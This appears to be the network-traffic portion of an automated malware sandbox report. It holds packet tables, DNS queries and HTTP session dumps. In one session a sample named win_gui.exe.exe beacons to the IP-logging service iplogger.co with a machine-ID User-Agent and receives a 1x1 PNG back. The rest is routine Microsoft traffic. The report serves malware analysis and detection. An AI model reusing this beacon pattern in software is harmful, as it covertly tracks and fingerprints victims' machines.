                                Dec 3, 2024 17:53:15.235631943 CET50225443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:15.235692024 CET50225443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:15.235714912 CET4435022513.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:15.235726118 CET50225443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:15.235735893 CET4435022513.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:15.239157915 CET50230443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:15.239217043 CET4435023013.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:15.239329100 CET50230443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:15.239481926 CET50230443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:15.239501953 CET4435023013.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:15.416440010 CET4435022613.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:15.417021990 CET50226443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:15.417058945 CET4435022613.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:15.417582989 CET50226443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:15.417587042 CET4435022613.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:15.799256086 CET4435022713.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:15.799871922 CET50227443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:15.799900055 CET4435022713.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:15.800388098 CET50227443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:15.800393105 CET4435022713.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:15.852499008 CET4435022613.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:15.852529049 CET4435022613.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:15.852655888 CET50226443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:15.852696896 CET4435022613.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:15.853010893 CET50226443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:15.853017092 CET4435022613.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:15.853041887 CET50226443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:15.853216887 CET4435022613.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:15.853252888 CET4435022613.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:15.853895903 CET50226443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:15.856146097 CET50231443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:15.856198072 CET4435023113.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:15.856270075 CET50231443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:15.856430054 CET50231443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:15.856446981 CET4435023113.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:16.232522011 CET4435022813.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:16.233046055 CET50228443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:16.233072996 CET4435022813.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:16.233552933 CET50228443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:16.233558893 CET4435022813.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:16.303380013 CET4435022713.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:16.303411007 CET4435022713.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:16.303427935 CET4435022713.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:16.303555012 CET50227443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:16.303586960 CET4435022713.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:16.303869009 CET50227443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:16.545521021 CET4435022713.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:16.545536041 CET4435022713.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:16.545593977 CET4435022713.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:16.545671940 CET50227443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:16.545695066 CET4435022713.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:16.545727015 CET50227443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:16.545758963 CET50227443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:16.545922041 CET50227443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:16.545937061 CET4435022713.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:16.545948029 CET50227443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:16.545953035 CET4435022713.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:16.549520969 CET50232443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:16.549566031 CET4435023213.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:16.549683094 CET50232443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:16.549844027 CET50232443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:16.549860001 CET4435023213.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:16.708795071 CET4435022913.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:16.709372997 CET50229443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:16.709395885 CET4435022913.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:16.709884882 CET50229443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:16.709889889 CET4435022913.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:16.771341085 CET4435022813.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:16.771373987 CET4435022813.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:16.771435022 CET50228443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:16.771456957 CET4435022813.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:16.771657944 CET50228443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:16.771707058 CET50228443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:16.771712065 CET4435022813.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:16.771745920 CET50228443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:16.771907091 CET4435022813.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:16.771938086 CET4435022813.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:16.772465944 CET50228443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:16.774745941 CET50233443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:16.774799109 CET4435023313.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:16.774868011 CET50233443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:16.775048018 CET50233443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:16.775064945 CET4435023313.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:17.041941881 CET4435023013.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:17.043332100 CET50230443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:17.043360949 CET4435023013.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:17.043829918 CET50230443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:17.043834925 CET4435023013.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:17.160965919 CET4435022913.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:17.160994053 CET4435022913.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:17.161133051 CET50229443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:17.161161900 CET4435022913.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:17.161417007 CET50229443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:17.161432981 CET4435022913.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:17.161447048 CET50229443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:17.161624908 CET4435022913.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:17.161662102 CET4435022913.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:17.161735058 CET50229443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:17.164757013 CET50234443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:17.164804935 CET4435023413.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:17.164910078 CET50234443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:17.165080070 CET50234443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:17.165095091 CET4435023413.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:17.487477064 CET4435023013.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:17.490688086 CET4435023013.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:17.490808010 CET50230443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:17.490855932 CET50230443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:17.490855932 CET50230443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:17.490875959 CET4435023013.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:17.490895033 CET4435023013.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:17.493937969 CET50235443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:17.493990898 CET4435023513.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:17.494071007 CET50235443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:17.494229078 CET50235443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:17.494240999 CET4435023513.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:17.660793066 CET4435023113.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:17.661478996 CET50231443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:17.661509037 CET4435023113.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:17.661976099 CET50231443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:17.661981106 CET4435023113.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:18.107721090 CET4435023113.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:18.107799053 CET4435023113.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:18.108066082 CET50231443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:18.108112097 CET50231443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:18.108131886 CET4435023113.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:18.108144045 CET50231443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:18.108151913 CET4435023113.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:18.111323118 CET50236443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:18.111371994 CET4435023613.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:18.111440897 CET50236443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:18.111619949 CET50236443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:18.111634970 CET4435023613.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:18.280844927 CET4435023213.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:18.281358004 CET50232443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:18.281388998 CET4435023213.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:18.281877995 CET50232443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:18.281887054 CET4435023213.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:18.669297934 CET4435023313.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:18.670022964 CET50233443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:18.670054913 CET4435023313.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:18.670528889 CET50233443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:18.670536041 CET4435023313.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:18.791580915 CET4435023213.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:18.791764021 CET4435023213.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:18.792058945 CET50232443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:18.792102098 CET50232443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:18.792120934 CET4435023213.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:18.792138100 CET50232443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:18.792143106 CET4435023213.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:18.795203924 CET50237443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:18.795244932 CET4435023713.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:18.795325994 CET50237443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:18.795520067 CET50237443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:18.795530081 CET4435023713.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:18.980015039 CET4435023413.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:18.980806112 CET50234443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:18.980833054 CET4435023413.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:18.981300116 CET50234443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:18.981304884 CET4435023413.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:19.128592014 CET4435023313.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:19.131669998 CET4435023313.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:19.131793976 CET50233443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:19.131839991 CET50233443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:19.131839991 CET50233443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:19.131866932 CET4435023313.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:19.131877899 CET4435023313.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:19.135129929 CET50238443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:19.135157108 CET4435023813.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:19.135379076 CET50238443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:19.135534048 CET50238443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:19.135543108 CET4435023813.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:19.300656080 CET4435023513.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:19.301749945 CET50235443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:19.301781893 CET4435023513.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:19.302228928 CET50235443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:19.302234888 CET4435023513.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:19.438822031 CET4435023413.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:19.438857079 CET4435023413.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:19.438909054 CET4435023413.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:19.447321892 CET4435023413.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:19.453015089 CET50234443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:19.453421116 CET50234443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:19.453440905 CET4435023413.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:19.453479052 CET50234443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:19.453490019 CET4435023413.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:19.746217966 CET4435023513.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:19.749439955 CET4435023513.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:19.755326033 CET4435023513.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:19.756763935 CET50235443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:19.779175043 CET50235443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:19.779196024 CET4435023513.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:19.779206038 CET50235443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:19.779211998 CET4435023513.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:20.022026062 CET4435023613.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:20.072073936 CET50236443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:20.076517105 CET50236443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:20.076529026 CET4435023613.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:20.083787918 CET50236443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:20.083801031 CET4435023613.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:20.477446079 CET4435023613.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:20.480642080 CET4435023613.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:20.480720043 CET50236443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:20.480767012 CET50236443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:20.480767012 CET50236443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:20.480791092 CET4435023613.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:20.480804920 CET4435023613.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:20.624536991 CET4435023713.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:20.625200987 CET50237443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:20.625231028 CET4435023713.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:20.625782013 CET50237443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:20.625787020 CET4435023713.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:20.915091991 CET4435023813.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:20.915667057 CET50238443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:20.915685892 CET4435023813.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:20.916192055 CET50238443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:20.916197062 CET4435023813.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:21.060758114 CET4435023713.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:21.063894987 CET4435023713.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:21.063981056 CET50237443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:21.064032078 CET50237443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:21.064032078 CET50237443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:21.064052105 CET4435023713.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:21.064060926 CET4435023713.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:21.382250071 CET4435023813.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:21.382312059 CET4435023813.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:21.382374048 CET50238443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:21.382673025 CET50238443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:21.382684946 CET4435023813.107.246.63192.168.2.5
                                Dec 3, 2024 17:53:21.382695913 CET50238443192.168.2.513.107.246.63
                                Dec 3, 2024 17:53:21.382700920 CET4435023813.107.246.63192.168.2.5
                                Timestamp  Source Port  Dest Port  Source IP  Dest IP
                                Dec 3, 2024 17:50:48.802030087 CET  57334  53  192.168.2.5  1.1.1.1
                                Dec 3, 2024 17:50:49.294878960 CET  53  57334  1.1.1.1  192.168.2.5
                                Dec 3, 2024 17:50:49.599678993 CET  62850  274  192.168.2.5  192.168.2.1
                                Dec 3, 2024 17:54:31.763848066 CET  138  138  192.168.2.5  192.168.2.255
                                Timestamp  Source IP  Dest IP  Checksum  Code  Type
                                Dec 3, 2024 17:50:49.599752903 CET  192.168.2.1  192.168.2.5  830c  (Port unreachable)  Destination Unreachable
                                Timestamp  Source IP  Dest IP  Trans ID  OP Code  Name  Type  Class  DNS over HTTPS
                                Dec 3, 2024 17:50:48.802030087 CET  192.168.2.5  1.1.1.1  0x7972  Standard query (0)  iplogger.co  A (IP address)  IN (0x0001)  false
                                Timestamp  Source IP  Dest IP  Trans ID  Reply Code  Name  CName  Address  Type  Class  DNS over HTTPS
                                Dec 3, 2024 17:50:49.294878960 CET  1.1.1.1  192.168.2.5  0x7972  No error (0)  iplogger.co  (none)  172.67.167.249  A (IP address)  IN (0x0001)  false
                                Dec 3, 2024 17:50:49.294878960 CET  1.1.1.1  192.168.2.5  0x7972  No error (0)  iplogger.co  (none)  104.21.82.93  A (IP address)  IN (0x0001)  false
                                • beginuser-agent:
                                  • iplogger.co
                                • fs.microsoft.com
                                • otelrules.azureedge.net
                                • slscr.update.microsoft.com
                                • enduser-agent:
                                Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                0  192.168.2.5  49959  172.67.167.249  443  1864  C:\Users\user\Desktop\win_gui.exe.exe
                                Timestamp  Bytes transferred  Direction  Data
                                2024-12-03 16:50:50 UTC  142  OUT  GET /155qJ4.torrent HTTP/1.1
                                Referer: BEGIN
                                User-Agent: 391467B9-BD4E-2B74-71A6-03A3DA3DE322
                                Host: iplogger.co
                                Cache-Control: no-cache
                                2024-12-03 16:50:51 UTC  1357  IN  HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:50:51 GMT
                                Content-Type: image/png
                                Transfer-Encoding: chunked
                                Connection: close
                                memory: 0.6112594604492188
                                expires: Tue, 03 Dec 2024 16:50:51 +0000
                                Cache-Control: no-store, no-cache, must-revalidate
                                strict-transport-security: max-age=604800
                                strict-transport-security: max-age=31536000
                                content-security-policy: img-src https: data:; upgrade-insecure-requests
                                x-frame-options: SAMEORIGIN
                                CF-Cache-Status: BYPASS
                                Set-Cookie: 55593078137264100=3; expires=Wed, 03 Dec 2025 16:50:51 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                                Set-Cookie: clhf03028ja=8.46.123.228; expires=Wed, 03 Dec 2025 16:50:51 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6qctmF3wksDZQnsG5W1PoAQeYH6CDd5i7z5NTdZ%2Box4e30OAK0ja%2Bvi2NxMn5jaFQokh7TlYJu64eKtLXeIDspDL7jBK%2FOyGKzc0s5c9tmuglsJmA%2FYVydTjnXBKLg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 8ec50edced5d80d9-EWR
                                alt-svc: h3=":443"; ma=86400
                                server-timing: cfL4;desc="?proto=TCP&rtt=79167&min_rtt=4789&rtt_var=46149&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2822&recv_bytes=780&delivery_rate=609730&cwnd=252&unsent_bytes=0&cid=7a32f3549aa0f5bc&ts=852&x=0"
                                2024-12-03 16:50:51 UTC  12  IN  Data Raw: 37 34 0d 0a 89 50 4e 47 0d 0a 1a 0a
                                Data Ascii: 74PNG
                                2024-12-03 16:50:51 UTC  110  IN  Data Raw: 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 03 50 4c 54 45 00 00 00 a7 7a 3d da 00 00 00 01 74 52 4e 53 00 40 e6 d8 66 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 00 0a 49 44 41 54 08 99 63 60 00 00 00 02 00 01 f4 71 64 a6 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a
                                Data Ascii: IHDR%VPLTEz=tRNS@fpHYs+IDATc`qdIENDB`
                                2024-12-03 16:50:51 UTC  5  IN  Data Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                1  192.168.2.5  49963  23.218.208.109  443
                                Timestamp  Bytes transferred  Direction  Data
                                2024-12-03 16:50:55 UTC  161  OUT  HEAD /fs/windows/config.json HTTP/1.1
                                Connection: Keep-Alive
                                Accept: */*
                                Accept-Encoding: identity
                                User-Agent: Microsoft BITS/7.8
                                Host: fs.microsoft.com
                                2024-12-03 16:50:55 UTC | 479 | IN | HTTP/1.1 200 OK
                                Content-Type: application/octet-stream
                                Server: Kestrel
                                ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                X-Ms-ApiVersion: Distribute 1.2
                                X-Ms-Region: prod-weu-z1
                                Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                X-OSID: 2
                                X-CID: 2
                                X-CCC: GB
                                Cache-Control: public, max-age=162393
                                Date: Tue, 03 Dec 2024 16:50:55 GMT
                                Connection: close
                                X-CID: 2


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                2 | 192.168.2.5 | 49964 | 23.218.208.109 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:50:57 UTC | 239 | OUT | GET /fs/windows/config.json HTTP/1.1
                                Connection: Keep-Alive
                                Accept: */*
                                Accept-Encoding: identity
                                If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                Range: bytes=0-2147483646
                                User-Agent: Microsoft BITS/7.8
                                Host: fs.microsoft.com
                                2024-12-03 16:50:58 UTC | 534 | IN | HTTP/1.1 200 OK
                                Content-Type: application/octet-stream
                                Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                ApiVersion: Distribute 1.1
                                Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                X-Azure-Ref: 0WwMRYwAAAABe7whxSEuqSJRuLqzPsqCaTE9OMjFFREdFMTcxNQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y=
                                Cache-Control: public, max-age=69266
                                Date: Tue, 03 Dec 2024 16:50:58 GMT
                                Content-Length: 55
                                Connection: close
                                X-CID: 2
                                2024-12-03 16:50:58 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                3 | 192.168.2.5 | 49966 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:51:06 UTC | 195 | OUT | GET /rules/other-Win32-v19.bundle HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:07 UTC | 471 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:06 GMT
                                Content-Type: text/plain
                                Content-Length: 218853
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public
                                Last-Modified: Fri, 29 Nov 2024 23:15:49 GMT
                                ETag: "0x8DD10CBC2E3B852"
                                x-ms-request-id: 82d9e4b2-501e-007b-3a87-435ba2000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165106Z-174f78459685m244hC1EWRgp2c0000001640000000003q5w
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                4 | 192.168.2.5 | 49970 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:51:09 UTC | 192 | OUT | GET /rules/rule120600v4s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:10 UTC | 494 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:10 GMT
                                Content-Type: text/xml
                                Content-Length: 2980
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                ETag: "0x8DC582BA80D96A1"
                                x-ms-request-id: 663f4ef8-b01e-0053-4c19-44cdf8000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165110Z-174f7845968frfdmhC1EWRxxbw000000167000000000h54w
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:10 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
